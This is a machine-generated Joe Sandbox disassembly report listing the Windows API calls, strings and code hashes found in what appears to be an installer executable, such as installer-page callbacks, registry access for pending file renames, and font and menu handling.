                                                              • GetModuleHandleA.KERNEL32(advapi32.dll,RegDeleteKeyExA,?,00000000,0042DFEB,00000000,0042E003,?,?,?,?,00000006,?,00000000,0049785D), ref: 0042DE6B
                                                              • GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 0042DE71
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: AddressDeleteHandleModuleProc
                                                              • String ID: RegDeleteKeyExA$advapi32.dll
                                                              • API String ID: 588496660-1846899949
                                                              • Opcode ID: ed1542cdc99e60fdc1e6205037aed1b156b4601bf62b1d4fa5b097ff81e7402e
                                                              • Instruction ID: e7246de0df94fba710dd2820c0ca51643d5dd29c3ac0bea476bad59fd0e01b91
                                                              • Opcode Fuzzy Hash: ed1542cdc99e60fdc1e6205037aed1b156b4601bf62b1d4fa5b097ff81e7402e
                                                              • Instruction Fuzzy Hash: 73E06DF1B41B30AAD72022657C8ABA33729DB75365F658437F105AD19183FC2C50CE9D
                                                              Strings
                                                              • NextButtonClick, xrefs: 0046BC4C
                                                              • Need to restart Windows? %s, xrefs: 0046BE95
                                                              • PrepareToInstall failed: %s, xrefs: 0046BE6E
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Need to restart Windows? %s$NextButtonClick$PrepareToInstall failed: %s
                                                              • API String ID: 0-2329492092
                                                              • Opcode ID: bdd1d04c3163942a70fe70ce9c3da0cdba0d450c43b562cfb8d9ec13df8274e7
                                                              • Instruction ID: 9de4db1b3e70fdebeced0fe060001c857bcfdee1b2562a0b259a97201065334e
                                                              • Opcode Fuzzy Hash: bdd1d04c3163942a70fe70ce9c3da0cdba0d450c43b562cfb8d9ec13df8274e7
                                                              • Instruction Fuzzy Hash: 46D12F34A00108DFCB14EB99D985AED77F5EF49304F5440BAE404EB362D778AE85CB9A
                                                              APIs
                                                              • SetActiveWindow.USER32(?,?,00000000,004833D5), ref: 004831A8
                                                              • SHChangeNotify.SHELL32(08000000,00000000,00000000,00000000), ref: 00483246
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: ActiveChangeNotifyWindow
                                                              • String ID: $Need to restart Windows? %s
                                                              • API String ID: 1160245247-4200181552
                                                              • Opcode ID: 00647651f2966e2d6c0ac7b0a33bca8c0b176202d01056079f53a530b7b0addf
                                                              • Instruction ID: 855c298393525188f16043e43c8caa20abfdb27870bda8f6eb76b0fac02994d3
                                                              • Opcode Fuzzy Hash: 00647651f2966e2d6c0ac7b0a33bca8c0b176202d01056079f53a530b7b0addf
                                                              • Instruction Fuzzy Hash: 7E918F34A042449FDB10EF69D8C6BAD77E0AF55708F5484BBE8009B362DB78AE05CB5D
                                                              APIs
                                                                • Part of subcall function 0042C804: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C828
                                                              • GetLastError.KERNEL32(00000000,0046FCD9,?,?,0049C1E0,00000000), ref: 0046FBB6
                                                              • SHChangeNotify.SHELL32(00000008,00000001,00000000,00000000), ref: 0046FC30
                                                              • SHChangeNotify.SHELL32(00001000,00001001,00000000,00000000), ref: 0046FC55
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: ChangeNotify$ErrorFullLastNamePath
                                                              • String ID: Creating directory: %s
                                                              • API String ID: 2451617938-483064649
                                                              • Opcode ID: 1aeec9fc70de36e1ff09abf6a814cf31666cc4aa73152690207cd024c9806782
                                                              • Instruction ID: a145aa70eb484b5d007d33f2831cd5d1f219efd535f83afbcf26a903565c5eea
                                                              • Opcode Fuzzy Hash: 1aeec9fc70de36e1ff09abf6a814cf31666cc4aa73152690207cd024c9806782
                                                              • Instruction Fuzzy Hash: 7D512F74E00248ABDB01DBA5D982ADEBBF4AF49304F50847AEC50B7382D7795E08CB59
                                                              APIs
                                                              • GetProcAddress.KERNEL32(00000000,SfcIsFileProtected), ref: 00454E82
                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000FFF,00000000,00454F48), ref: 00454EEC
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: AddressByteCharMultiProcWide
                                                              • String ID: SfcIsFileProtected$sfc.dll
                                                              • API String ID: 2508298434-591603554
                                                              • Opcode ID: bb559eb6b427547f50ac361efa45694dce53a5facbc0d321e4ca2111cb35c873
                                                              • Instruction ID: 709c5f55a6f5f8285c9c61fd8393730e8027effee09c5548c71846991cac34f0
                                                              • Opcode Fuzzy Hash: bb559eb6b427547f50ac361efa45694dce53a5facbc0d321e4ca2111cb35c873
                                                              • Instruction Fuzzy Hash: E8419671A04318DBEB20EF59DC85B9DB7B8AB4430DF5041B7A908A7293D7785F88CA1C
                                                              APIs
                                                              • 74D31520.VERSION(00000000,?,?,?,00497900), ref: 00452530
                                                              • 74D31500.VERSION(00000000,?,00000000,?,00000000,004525AB,?,00000000,?,?,?,00497900), ref: 0045255D
                                                              • 74D31540.VERSION(?,004525D4,?,?,00000000,?,00000000,?,00000000,004525AB,?,00000000,?,?,?,00497900), ref: 00452577
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: D31500D31520D31540
                                                              • String ID: %E
                                                              • API String ID: 1003763464-175436132
                                                              • Opcode ID: f18440ec30d6a8502c14f0dca7f1c7caee1af709ad5b943411f89d38bbe9f821
                                                              • Instruction ID: f5dca5bfdad9659449235e2d7a4f424f1fde127461be4d93bb02e754cc996b3f
                                                              • Opcode Fuzzy Hash: f18440ec30d6a8502c14f0dca7f1c7caee1af709ad5b943411f89d38bbe9f821
                                                              • Instruction Fuzzy Hash: D2218331A00608BFDB01DAA989519AFB7FCEB4A300F554477F800E7242E6B9AE04C765
                                                              APIs
                                                              • GetDC.USER32(00000000), ref: 0044B401
                                                              • SelectObject.GDI32(?,00000000), ref: 0044B424
                                                              • ReleaseDC.USER32(00000000,?), ref: 0044B457
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: ObjectReleaseSelect
                                                              • String ID: %H
                                                              • API String ID: 1831053106-1959103961
                                                              • Opcode ID: 613a86eb96bd964688756472f8397141eb38d2c4caf6b0936a0a8cf616000036
                                                              • Instruction ID: 242bcfed98594cbdcf51f2854abe94a1ec69c13560e3a72339b9f4254961cc58
                                                              • Opcode Fuzzy Hash: 613a86eb96bd964688756472f8397141eb38d2c4caf6b0936a0a8cf616000036
                                                              • Instruction Fuzzy Hash: 62216570A04248AFEB15DFA6C841B9F7BB9DB49304F11806AF904A7682D778D940CB59
                                                              APIs
                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,0044B14C,?,%H,?,?), ref: 0044B11E
                                                              • DrawTextW.USER32(?,?,00000000,?,?), ref: 0044B131
                                                              • DrawTextA.USER32(?,00000000,00000000,?,?), ref: 0044B165
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: DrawText$ByteCharMultiWide
                                                              • String ID: %H
                                                              • API String ID: 65125430-1959103961
                                                              • Opcode ID: b9978a40832644be7eb99ff61e6ae739c3599586bb389d309c0d7579617ef2e1
                                                              • Instruction ID: fec6fabf6d030a51aab30bc406273ff78954f96defe81b00f374268ef7e1f253
                                                              • Opcode Fuzzy Hash: b9978a40832644be7eb99ff61e6ae739c3599586bb389d309c0d7579617ef2e1
                                                              • Instruction Fuzzy Hash: 2A11CBB27046047FEB00DB6A9C91D6F77ECDB49750F10817BF504D72D0D6399E018669
                                                              APIs
                                                              • SHAutoComplete.SHLWAPI(00000000,00000001), ref: 0042EDC5
                                                                • Part of subcall function 0042D8C4: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8D7
                                                                • Part of subcall function 0042E394: SetErrorMode.KERNEL32(00008000), ref: 0042E39E
                                                                • Part of subcall function 0042E394: LoadLibraryA.KERNEL32(00000000,00000000,0042E3E8,?,00000000,0042E406,?,00008000), ref: 0042E3CD
                                                              • GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 0042EDA8
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: AddressAutoCompleteDirectoryErrorLibraryLoadModeProcSystem
                                                              • String ID: SHAutoComplete$shlwapi.dll
                                                              • API String ID: 395431579-1506664499
                                                              • Opcode ID: 42f9dcb05abbf77f41298dba7160eccf52289638d4fdae2cac913a0c4d077c72
                                                              • Instruction ID: e807f919b0f5f47641bb36d66eaae5ab4e0d2818c3cb02d7dc2bc8906116ae4e
                                                              • Opcode Fuzzy Hash: 42f9dcb05abbf77f41298dba7160eccf52289638d4fdae2cac913a0c4d077c72
                                                              • Instruction Fuzzy Hash: 3311A330B00319BBD711EB62FD85B8E7BA8DB55704F90447BF40066291DBB8AE05C65D
                                                              APIs
                                                                • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                              • RegCloseKey.ADVAPI32(?,00455A7B,?,00000001,00000000), ref: 00455A6E
                                                              Strings
                                                              • PendingFileRenameOperations, xrefs: 00455A40
                                                              • PendingFileRenameOperations2, xrefs: 00455A4F
                                                              • SYSTEM\CurrentControlSet\Control\Session Manager, xrefs: 00455A1C
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: CloseOpen
                                                              • String ID: PendingFileRenameOperations$PendingFileRenameOperations2$SYSTEM\CurrentControlSet\Control\Session Manager
                                                              • API String ID: 47109696-2115312317
                                                              • Opcode ID: 336a8554af3216e9fad4f98949cc8fac3f30a8fbf7097481dd1a9e766711aba3
                                                              • Instruction ID: e9356c19d9a7d2c1b22529064790e486fb2be540b5bf165494b3782c633fa2c0
                                                              • Opcode Fuzzy Hash: 336a8554af3216e9fad4f98949cc8fac3f30a8fbf7097481dd1a9e766711aba3
                                                              • Instruction Fuzzy Hash: A3F0F671304A08BFDB04D661DC62A3B739CE744725FB08167F800CB682EA7CBD04915C
                                                              APIs
                                                              • FindNextFileA.KERNEL32(000000FF,?,00000000,00472325,?,00000000,?,0049C1E0,00000000,00472515,?,00000000,?,00000000,?,004726E1), ref: 00472301
                                                              • FindClose.KERNEL32(000000FF,0047232C,00472325,?,00000000,?,0049C1E0,00000000,00472515,?,00000000,?,00000000,?,004726E1,?), ref: 0047231F
                                                              • FindNextFileA.KERNEL32(000000FF,?,00000000,00472447,?,00000000,?,0049C1E0,00000000,00472515,?,00000000,?,00000000,?,004726E1), ref: 00472423
                                                              • FindClose.KERNEL32(000000FF,0047244E,00472447,?,00000000,?,0049C1E0,00000000,00472515,?,00000000,?,00000000,?,004726E1,?), ref: 00472441
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                               • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: Find$CloseFileNext
                                                              • String ID:
                                                              • API String ID: 2066263336-0
                                                              • Opcode ID: 5852171562c0697583dfb39d2e83bd074d15792751f52c1309e6650eed3a72c0
                                                              • Instruction ID: ff38abb04fb96460afd2c3532f2e87b2ffc4f25b99c166b2ff4046d92e8ebf4f
                                                              • Opcode Fuzzy Hash: 5852171562c0697583dfb39d2e83bd074d15792751f52c1309e6650eed3a72c0
                                                              • Instruction Fuzzy Hash: 3EC14C3490424D9FCF11DFA5C981ADEBBB8FF49304F5080AAE808B3251D7789A46CF58
                                                              APIs
                                                              • FindNextFileA.KERNEL32(000000FF,?,?,?,?,00000000,0047FEF1,?,00000000,00000000,?,?,00481147,?,?,00000000), ref: 0047FD9E
                                                              • FindClose.KERNEL32(000000FF,000000FF,?,?,?,?,00000000,0047FEF1,?,00000000,00000000,?,?,00481147,?,?), ref: 0047FDAB
                                                              • FindNextFileA.KERNEL32(000000FF,?,00000000,0047FEC4,?,?,?,?,00000000,0047FEF1,?,00000000,00000000,?,?,00481147), ref: 0047FEA0
                                                              • FindClose.KERNEL32(000000FF,0047FECB,0047FEC4,?,?,?,?,00000000,0047FEF1,?,00000000,00000000,?,?,00481147,?), ref: 0047FEBE
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                               • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: Find$CloseFileNext
                                                              • String ID:
                                                              • API String ID: 2066263336-0
                                                              • Opcode ID: 56ee50c7cb7fa2545e62f1cc5d9b880787f4aaf8996287a3801f00069153f90f
                                                              • Instruction ID: 5570db9595827249690d4c596f970be035a6cb65fb6c4bc3b070d2a6e7e06d26
                                                              • Opcode Fuzzy Hash: 56ee50c7cb7fa2545e62f1cc5d9b880787f4aaf8996287a3801f00069153f90f
                                                              • Instruction Fuzzy Hash: 34512D71A006499FCB21DF65CC45ADEB7B8EB88319F1084BAA818A7351D7389F89CF54
                                                              APIs
                                                              • GetMenu.USER32(00000000), ref: 00421361
                                                              • SetMenu.USER32(00000000,00000000), ref: 0042137E
                                                              • SetMenu.USER32(00000000,00000000), ref: 004213B3
                                                              • SetMenu.USER32(00000000,00000000), ref: 004213CF
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                               • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: Menu
                                                              • String ID:
                                                              • API String ID: 3711407533-0
                                                              • Opcode ID: 011238806e8749de4259267c2425fab43e1a23b2a7ed20fe69ece2c0c4e48eae
                                                              • Instruction ID: 68e231870b0c3442489bede8fdcf2aa1db34e154331db007d9f14f65c1163b63
                                                              • Opcode Fuzzy Hash: 011238806e8749de4259267c2425fab43e1a23b2a7ed20fe69ece2c0c4e48eae
                                                              • Instruction Fuzzy Hash: 4641AE3070425447EB20EA3AA9857AB36925B20308F4841BFFC40DF7A3CA7CDD45839D
                                                              APIs
                                                              • SendMessageA.USER32(?,?,?,?), ref: 00416B84
                                                              • SetTextColor.GDI32(?,00000000), ref: 00416B9E
                                                              • SetBkColor.GDI32(?,00000000), ref: 00416BB8
                                                              • CallWindowProcA.USER32(?,?,?,?,?), ref: 00416BE0
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                               • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: Color$CallMessageProcSendTextWindow
                                                              • String ID:
                                                              • API String ID: 601730667-0
                                                              • Opcode ID: 072521f5090f240ceba025e33949739ce14f97652003165ca459573163e57643
                                                              • Instruction ID: 4ea48ea5c9b96bae81565ca4ce64eb356f32bd46963e120bc97d04dec40f2685
                                                              • Opcode Fuzzy Hash: 072521f5090f240ceba025e33949739ce14f97652003165ca459573163e57643
                                                              • Instruction Fuzzy Hash: BC115171705604AFD710EE6ECC84E8777ECEF49310715887EB959CB612C638F8418B69
                                                              APIs
                                                              • GetDC.USER32(00000000), ref: 0042311E
                                                              • EnumFontsA.GDI32(00000000,00000000,00423068,00410460,00000000,?,?,00000000,?,00418FD3,00000000,?,?,?,00000001), ref: 00423131
                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00423139
                                                              • ReleaseDC.USER32(00000000,00000000), ref: 00423144
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                               • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: CapsDeviceEnumFontsRelease
                                                              • String ID:
                                                              • API String ID: 2698912916-0
                                                              • Opcode ID: ae3b46bdf4144dece9088701a44aa945a4d7eb571b2044da6dc5baa79edeb2ca
                                                              • Instruction ID: a9d24610abdaa6694e735d00c6d38f20457f2ac5f1468c421a1b182fb2ef8db9
                                                              • Opcode Fuzzy Hash: ae3b46bdf4144dece9088701a44aa945a4d7eb571b2044da6dc5baa79edeb2ca
                                                              • Instruction Fuzzy Hash: 8D01CC716042102AE700BF6A5C82B9B3AA49F01319F40027BF808AA3C6DA7E980547AE
                                                              APIs
                                                                • Part of subcall function 0045092C: SetEndOfFile.KERNEL32(?,?,0045C342,00000000,0045C4CD,?,00000000,00000002,00000002), ref: 00450933
                                                              • FlushFileBuffers.KERNEL32(?), ref: 0045C499
                                                              Strings
                                                              • EndOffset range exceeded, xrefs: 0045C3CD
                                                              • NumRecs range exceeded, xrefs: 0045C396
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                               • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: File$BuffersFlush
                                                              • String ID: EndOffset range exceeded$NumRecs range exceeded
                                                              • API String ID: 3593489403-659731555
                                                              • Opcode ID: a46ebc0c75e38cfc1d47e83880391ac29e35d2e9842f1f48ebdcfee3728b7fb6
                                                              • Instruction ID: 69b4fe9c868b7cadc716880164946defc5db249b4b2908964217ac1dcc813941
                                                              • Opcode Fuzzy Hash: a46ebc0c75e38cfc1d47e83880391ac29e35d2e9842f1f48ebdcfee3728b7fb6
                                                              • Instruction Fuzzy Hash: 4F617334A002588FDB25DF25C891AD9B7B5AF49305F0084DAED88AB353D674AEC8CF54
                                                              APIs
                                                                • Part of subcall function 00403344: GetModuleHandleA.KERNEL32(00000000,00498BB6), ref: 0040334B
                                                                • Part of subcall function 00403344: GetCommandLineA.KERNEL32(00000000,00498BB6), ref: 00403356
                                                                • Part of subcall function 0040631C: GetModuleHandleA.KERNEL32(kernel32.dll,?,00498BC0), ref: 00406322
                                                                • Part of subcall function 0040631C: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0040632F
                                                                • Part of subcall function 0040631C: GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 00406345
                                                                • Part of subcall function 0040631C: GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 0040635B
                                                                • Part of subcall function 0040631C: SetProcessDEPPolicy.KERNEL32(00000001,00000000,SetProcessDEPPolicy,00000000,SetSearchPathMode,kernel32.dll,?,00498BC0), ref: 00406366
                                                                • Part of subcall function 004063C4: 6F561CD0.COMCTL32(00498BC5), ref: 004063C4
                                                                • Part of subcall function 00410764: GetCurrentThreadId.KERNEL32 ref: 004107B2
                                                                • Part of subcall function 00419040: GetVersion.KERNEL32(00498BDE), ref: 00419040
                                                                • Part of subcall function 0044F744: GetModuleHandleA.KERNEL32(user32.dll,NotifyWinEvent,00498BF2), ref: 0044F77F
                                                                • Part of subcall function 0044F744: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0044F785
                                                                • Part of subcall function 0044FC10: GetVersionExA.KERNEL32(0049B790,00498BF7), ref: 0044FC1F
